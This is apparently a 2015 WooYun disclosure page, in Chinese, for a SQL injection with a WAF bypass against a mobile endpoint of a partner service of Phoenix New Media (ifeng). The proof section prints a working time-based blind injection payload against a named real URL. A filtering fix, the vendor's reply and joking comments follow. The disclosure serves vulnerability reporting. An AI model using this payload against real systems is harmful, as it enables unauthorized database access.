当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119490

漏洞标题:凤凰网SQL注入之waf绕过

相关厂商:凤凰网

漏洞作者: 小川

提交时间:2015-06-10 11:15

修复时间:2015-07-27 15:52

公开时间:2015-07-27 15:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-10: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

问题不大,再多过滤点

详细说明:

ragecomic.png

漏洞证明:

POST
http://astro.wap.ifeng.com/dlist.aspx
word=33'));if(left(db_name(),12)='db_aqiooplat')waitfor/**/delay/**/'0:0:8'/**/--

修复方案:

过滤if,left,len,weaitfor delay

版权声明:转载请注明来源 小川@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-06-12 15:50

厂商回复:

这个业务不是凤凰网的业务,是合作方阿启网的业务,我们正在跟进转交漏洞给他们,非常感谢。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-10 11:20 | diguoji ( 普通白帽子 | Rank:323 漏洞数:79 | 中国吉林长春)

    复出了

  2. 2015-06-10 11:27 | hh2014 ( 普通白帽子 | Rank:225 漏洞数:39 | 继续)

    好犀利,怎么绕过的。我要看漫画

  3. 2015-06-10 11:43 | 北丐 ( 普通白帽子 | Rank:104 漏洞数:20 | )

    我是来看漫画滴

  4. 2015-06-10 11:44 | 姗姗来迟 ( 普通白帽子 | Rank:297 漏洞数:72 | coffeesafe的小号)

    真厉害。以后就做动漫设计把。。

  5. 2015-06-10 11:51 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    我就是专门来看川神的暴漫的

  6. 2015-06-10 12:14 | Noxxx ( 普通白帽子 | Rank:509 漏洞数:41 )

    我是来看暴漫的

  7. 2015-06-10 14:56 | 嗯哼! ( 路人 | Rank:0 漏洞数:2 | 人才有点二!)

    小川,你的暴漫真好看,么么哒

  8. 2015-06-10 15:01 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    @小川 你来玩注入,要我们自么活 p-p

  9. 2015-06-10 15:15 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @卡卡 - -!我的都是些垃圾漏洞啊

  10. 2015-06-10 15:15 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    我是来关注技术的

  11. 2015-06-10 21:10 | 泪雨无魂 ( 实习白帽子 | Rank:94 漏洞数:32 )

    我就是专门来看川神的暴漫的

  12. 2015-07-27 16:11 | 表哥 ( 路人 | Rank:6 漏洞数:3 | 666的大表哥)

    我是来看暴漫的

  13. 2015-07-27 17:12 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @小川 川神